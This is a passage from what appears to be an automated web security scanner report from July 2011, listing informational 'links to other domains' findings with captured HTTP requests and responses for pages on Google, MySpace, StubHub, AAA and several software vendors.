Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=2&ved=0CCgQFjAB&url=http%3A%2F%2Fwww.bostonherald.com%2Fsports%2F&ei=fuslTsTLIojZ0QHQ7cDmCg&usg=AFQjCNE4m6GQV4OC1lgmnELAqiunXRgGtg

The response contains the following link to another domain:

http://www.bostonherald.com/sports/

Request

GET /url?sa=t&source=web&cd=2&ved=0CCgQFjAB&url=http%3A%2F%2Fwww.bostonherald.com%2Fsports%2F&ei=fuslTsTLIojZ0QHQ7cDmCg&usg=AFQjCNE4m6GQV4OC1lgmnELAqiunXRgGtg HTTP/1.1
Host: www.google.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=boston+herald&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 302 Found
Location: http://www.bostonherald.com/sports/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 Jul 2011 20:39:52 GMT
Server: gws
Content-Length: 232
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.bostonherald.com/sports/">here</A>
...[SNIP]...

20.84. http://www.googleadservices.com/pagead/conversion/1036609180/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googleadservices.com
Path:	/pagead/conversion/1036609180/

Issue detail

The page was loaded from a URL containing a query string:

http://www.googleadservices.com/pagead/conversion/1036609180/?random=1311085721821&cv=6&fst=1311085721821&num=1&fmt=1&value=0&label=q3ZTCJzPjgIQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=1&u_tz=-300&u_java=true&u_nplug=6&u_nmime=40&url=http%3A//sharethis.com/privacy

The response contains the following link to another domain:

https://services.google.com/sitestats/en_US.html?cid=1036609180

Request

GET /pagead/conversion/1036609180/?random=1311085721821&cv=6&fst=1311085721821&num=1&fmt=1&value=0&label=q3ZTCJzPjgIQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=1&u_tz=-300&u_java=true&u_nplug=6&u_nmime=40&url=http%3A//sharethis.com/privacy HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Tue, 19 Jul 2011 14:28:36 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1036609180/?random=1311085721821&cv=6&fst=1311085721821&num=1&fmt=1&value=0&label=q3ZTCJzPjgIQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=1&u_tz=-300&u_java=true&u_nplug=6&u_nmime=40&url=http%3A//sharethis.com/privacy&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 381
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1036609180" target="_blank">learn more</a>
...[SNIP]...

20.85. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intelex.com
Path:	/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w

The response contains the following links to other domains:

http://feeds.feedburner.com/intelex/ivSU
http://in.getclicky.com/197095ns.gif
http://itunes.apple.com/us/app/intelex/id356716739?mt=8
http://lct.salesforce.com/sfga.js
http://s7.addthis.com/js/250/addthis_widget.js
http://static.getclicky.com/js
http://www.addthis.com/bookmark.php?v=250&pubid=ra-4d77db2f6ef335f7
http://www.facebook.com/pages/Toronto-ON/Intelex-Technologies/344068196162
http://www.intelex-exchange.com/
http://www.intelex-exchange.com/admin/openwysiwyg_v1.4.7/styles/campaign-all.css
http://www.intelex-exchange.com/images/clients/NrgEnergySm.gif
http://www.intelex-exchange.com/images/landing/Logos%20Image28.jpg
http://www.linkedin.com/companies/659295
http://www.twitter.com/Intelex
http://www.youtube.com/user/intelexsoftware

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 98253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
<link href='/script/jQuery/fancybox/jquery.fancybox-1.3.0.css' type="text/css" rel="stylesheet" />
<link href="http://www.intelex-exchange.com/admin/openwysiwyg_v1.4.7/styles/campaign-all.css" rel="stylesheet" type="text/css" />
<!--[if lt IE 9]>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a href="http://www.addthis.com/bookmark.php?v=250&pubid=ra-4d77db2f6ef335f7" class="addthis_button_compact" title="Share">Share</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d77db2f6ef335f7"></script>
...[SNIP]...
<span style="float: right;">
<a title="Customer Community" class="common-bg" href="http://www.intelex-exchange.com/" target="_blank" style="display: inline-block; padding-left: 8px; background-repeat: no-repeat; background-position: left -125px; cursor: pointer;">
<span class="common-bg" style="display: inline-block; color: #FFFFFF; font-weight: bold; text-align: center; height: 17px; padding: 3px 6px 0 0
...[SNIP]...
<td>
<img src="http://www.intelex-exchange.com/images/clients/NrgEnergySm.gif" id="t2_imgQuoteLogo" border="0" style="padding-right: 30px;
margin-top: -2px;" width="94" height="52" />
</td>
...[SNIP]...
<td valign="top" align="center">
<img id="t2_formImage" src="http://www.intelex-exchange.com/images/landing/Logos%20Image28.jpg" style="height:200px;width:274px;" />
<div class="form-rounded curvyRedraw" style="border: 1px solid #AAAAAA; padding: 8px; margin-top: 5px;">
...[SNIP]...
<li><a href="http://www.twitter.com/Intelex" target="_blank" style="background-position: 0px -492px;"
title="Twitter"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Toronto-ON/Intelex-Technologies/344068196162" target="_blank" style="background-position: -24px -492px;"
title="Facebook"></a>
...[SNIP]...
<li><a href="http://www.linkedin.com/companies/659295" target="_blank" style="background-position: -48px -492px;"
title="LinkedIn"></a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/intelex/ivSU" target="_blank" style="background-position: -72px -492px;"
title="FeedBurner"></a>
...[SNIP]...
<li><a href="http://www.youtube.com/user/intelexsoftware" target="_blank" style="background-position: -96px -492px;"
title="Youtube"></a>
...[SNIP]...
<li><a href="http://itunes.apple.com/us/app/intelex/id356716739?mt=8" target="_blank" style="background-position: -120px -492px;"
title="iPhone App"></a>
...[SNIP]...
</script>

<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
<p style="display: none;"><img alt="Clicky" width="1" height="1" src="http://in.getclicky.com/197095ns.gif" /></p></noscript>
<script type="text/javascript" src="http://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

20.86. http://www.livedrive.com/SignupToLivedrive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.livedrive.com
Path:	/SignupToLivedrive

Issue detail

The page was loaded from a URL containing a query string:

http://www.livedrive.com/SignupToLivedrive?market=US

The response contains the following links to other domains:

http://twitter.com/livedrive_com
http://www.facebook.com/livedriveonline
https://apis.google.com/js/plusone.js

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>

Sign up for Livedrive
...[SNIP]...
</a>
<a class="FooterQuicklinkFacebook" href="http://www.facebook.com/livedriveonline">Facebook</a>
<a class="FooterQuicklinkTwitter" href="http://twitter.com/livedrive_com">Twitter</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

20.87. http://www.myspace.com/auth/loginform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/auth/loginform

Issue detail

The page was loaded from a URL containing a query string:

http://www.myspace.com/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=2&c2=4000002&cv=2.0&cj=1
http://cms.myspacecdn.com/cms/js/ad_wrapper0189.js
http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js
http://js.myspacecdn.com/modules/login/static/js/externalloginbundle_xbaqfwap.js
http://x.myspacecdn.com/modules/common/static/css/futura/icons_neguyziq.css
http://x.myspacecdn.com/modules/common/static/css/futuraglobal_-5bd9l4-.css
http://x.myspacecdn.com/modules/login/static/css/loginbundle_mlu5xceb.css

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Server: 58f11280d72c42fc4512638736510b7130783a7e53b4cdad
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCOUNTRY=US; domain=.myspace.com; expires=Tue, 26-Jul-2011 14:30:19 GMT; path=/
X-PoweredBy: Just our Will
Date: Tue, 19 Jul 2011 14:30:19 GMT
Content-Length: 11278
X-Vertical: globalsites

<!DOCTYPE html>
<html class="noJS en-US">

<head>
<script type="text/javascript">
   (function (wl, his) {var m = wl.href.match(/([?&]_escaped_fragment_=|#!(?=\/))([^&#]*)/);if (!
...[SNIP]...
<link rel="canonical" href="http://www.myspace.com/auth/loginform" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/common/static/css/futuraglobal_-5bd9l4-.css" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/common/static/css/futura/icons_neguyziq.css" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/login/static/css/loginbundle_mlu5xceb.css" />
</head>
...[SNIP]...
</script><script type="text/javascript" src="http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js"></script>
<script type="text/javascript" src="http://cms.myspacecdn.com/cms/js/ad_wrapper0189.js"></script>

   <script type="text/javascript" src="http://js.myspacecdn.com/modules/login/static/js/externalloginbundle_xbaqfwap.js"></script>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=4000002&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...

20.88. http://www.nne.aaa.com/en-nne/Pages/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nne.aaa.com
Path:	/en-nne/Pages/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.nne.aaa.com/en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com

The response contains the following links to other domains:

http://capwiz.com/aaanne/home/
http://get.adobe.com/flashplayer/
http://hits.convergetrack.com/Includes/CT.js
http://hits.convergetrack.com/default.aspx?ckid=1033
http://www.adobe.com/go/getflashplayer
http://www.nhtsa.gov/Vehicle+Safety/Recalls+&+Defects
http://www.res99.com/nexres/search/power_search.cgi?src=10023544

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<td><a class="Secondary" href="http://www.res99.com/nexres/search/power_search.cgi?src=10023544" target="_blank">Book Flights, Hotels or Cars</a>
...[SNIP]...
<td><a class="Tertiary" href="http://www.nhtsa.gov/Vehicle+Safety/Recalls+&+Defects" target="_blank">Search for Recalls</a>
...[SNIP]...
<p><a href="http://www.adobe.com/go/getflashplayer"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash player" />
...[SNIP]...
<p>This feature requires <a href="http://get.adobe.com/flashplayer/" target="_blank">Adobe® Flash Player</a>
...[SNIP]...
<p class="getFP"><a href="http://get.adobe.com/flashplayer/" target="_blank"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash Player" border="0" />
...[SNIP]...
<p>This feature requires <a href="http://get.adobe.com/flashplayer/" target="_blank">Adobe® Flash Player</a>
...[SNIP]...
<p class="getFP"><a href="http://get.adobe.com/flashplayer/" target="_blank"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash Player" border="0" />
...[SNIP]...
<li><a href="http://capwiz.com/aaanne/home/" target="_blank">Government Affairs</a>
...[SNIP]...

<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...
<noscript><img src="//hits.convergetrack.com/default.aspx?ckid=1033" width="1" height="1" alt=""/></noscript>
...[SNIP]...

20.89. http://www.numarasoftware.com/welcome/service_desk.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.numarasoftware.com
Path:	/welcome/service_desk.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js
http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2

Request

GET /welcome/service_desk.aspx?src=google&trm=issue_tracking_software HTTP/1.1
Host: www.numarasoftware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:24 GMT
Content-Length: 66115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="html" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/assets/css/landing.css" media="all" />
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/njs.gif?dcsuri=/nojavascript&WT.js=No&WT.tv=8.6.2"/></div>
...[SNIP]...

20.90. http://www.seapine.com/ttpro.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.seapine.com
Path:	/ttpro.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.seapine.com/ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content=

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js
http://munchkin.marketo.net/munchkin.js
http://t4.trackalyzer.com/trackalyze.js
http://twitter.com/seapine/
http://www.facebook.com/group.php?gid=8301473755
http://www.googleadservices.com/pagead/conversion.js
http://www.googleadservices.com/pagead/conversion/1072651148/?label=_WuqCNmvlgIQjLe9_wM&guid=ON&script=0
http://www.linkedin.com/groups?gid=57703

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Tue, 19 Jul 2011 16:20:48 GMT
Vary: Accept-Encoding
Content-Length: 28599
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<Title>Issue Tracking Software| TestTrack Pro | Bug Tracking
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://twitter.com/seapine/" target="_blank">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/group.php?gid=8301473755" target="_blank">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?gid=57703" target="_blank">LinkedIn</a>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072651148/?label=_WuqCNmvlgIQjLe9_wM&guid=ON&script=0"/>
</div>
...[SNIP]...

20.91. http://www.stubhub.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stubhub.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.stubhub.com/?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298

The response contains the following links to other domains:

http://cache1.stubhubstatic.com/promotions/scratch/CSS/event_help_module.css
http://cache1.stubhubstatic.com/promotions/scratch/CSS/genre_page_content_style.css
http://cache1.stubhubstatic.com/promotions/scratch/baynote/baynote.js
http://cache1.stubhubstatic.com/promotions/scratch/fb/fb_icon_small.png
http://cache1.stubhubstatic.com/promotions/scratch/foresee_v1/foresee-trigger.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/bubble.min-1.0.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/concerts_tabbl.gif
http://cache1.stubhubstatic.com/promotions/scratch/lt/content-1.1.min.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/geo_ui_v8.2.min.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/getCookie-2.1.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/hand_left.gif
http://cache1.stubhubstatic.com/promotions/scratch/lt/omniSearch_02.js
http://cache1.stubhubstatic.com/promotions/scratch/lt/sh_logo.gif
http://cache1.stubhubstatic.com/promotions/scratch/lt/sports_tab.gif
http://cache1.stubhubstatic.com/promotions/scratch/lt/theater_tab.gif
http://cache1.stubhubstatic.com/promotions/scratch/lt/www-3.8.css
http://cache1.stubhubstatic.com/promotions/scratch/sh/truste_logo_vert.gif
http://cache1.stubhubstatic.com/promotions/scratch/test/mbox.js
http://cache1.stubhubstatic.com/promotions/scratch/test/s_code_common.js
http://cache1.stubhubstatic.com/resources/css/jquery.autocomplete.css
http://cache1.stubhubstatic.com/resources/css/stubhub.css
http://cache1.stubhubstatic.com/resources/js/third_party/jquery.autocomplete.js
http://cache1.stubhubstatic.com/resources/mojito/css/common/noscript-RC.css
http://cache1.stubhubstatic.com/resources/mojito/css/common/stubhub.bundle.201105231737.min.css
http://cache1.stubhubstatic.com/resources/mojito/css/feature/ticket-1.0.css
http://cache1.stubhubstatic.com/resources/mojito/js/common/stubhub-1.2.js
http://cache1.stubhubstatic.com/resources/mojito/js/feature/ticket-1.0.js
http://cache1.stubhubstatic.com/resources/mojito/js/lib/jquery.bundle.201105231737.min.js
http://cache1.stubhubstatic.com/resources/mojito/js/pattern/phoenix-RC.js
http://cache3.stubhubstatic.com/resources/flex/TDMap-1.02.swf
http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab
http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js
http://www.adobe.com/go/getflashplayer
http://www.facebook.com/Stubhub
https://view.atdmt.com/iaction/sf1stu_UniversalAllPages_4

Request

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:48 GMT
Server: Apache
Set-Cookie: TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 4cb3#816c93/
com-stubhub-dye: 4cb3#816c93/
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Set-Cookie: STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/
Set-Cookie: STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<link type="text/css" rel="stylesheet" href="${domainProcess.StaticDomainUrlWithRequestProtocol}/resources/mojito/css/pattern/phoenix-RC.css"/> --><link href="http://cache1.stubhubstatic.com/resources/mojito/css/common/stubhub.bundle.201105231737.min.css" rel="stylesheet" type="text/css"/><link href="http://cache1.stubhubstatic.com/resources/mojito/css/common/noscript-RC.css" id="noscriptCssLink" rel="stylesheet" type="text/css"/><link href="http://cache1.stubhubstatic.com/resources/mojito/css/feature/ticket-1.0.css" rel="stylesheet" type="text/css"/><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/resources/css/stubhub.css">
<meta property="fb:app_id" content="109259765770403">
<link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/lt/www-3.8.css"><script src="http://cache1.stubhubstatic.com/promotions/scratch/test/mbox.js" language="Javascript1.2"></script><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/CSS/event_help_module.css">
<link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/CSS/genre_page_content_style.css"><script>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/foresee_v1/foresee-trigger.js"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/getCookie-2.1.js"></script><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/resources/css/jquery.autocomplete.css"><style>
...[SNIP]...
</noscript><script src="http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/omniSearch_02.js"></script>
...[SNIP]...
<a href="/" title="StubHub.com"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/sh_logo.gif" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/Stubhub" target="_blank" title="Become a fan on Facebook"><img src="http://cache1.stubhubstatic.com/promotions/scratch/fb/fb_icon_small.png" width="19" height="18" border="0" style="margin-bottom:-5px; margin-left:-1px;"></a>
...[SNIP]...
<a href="/sports-tickets/" title="sports tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/sports_tab.gif" width="69" height="31" border="0"></a>
...[SNIP]...
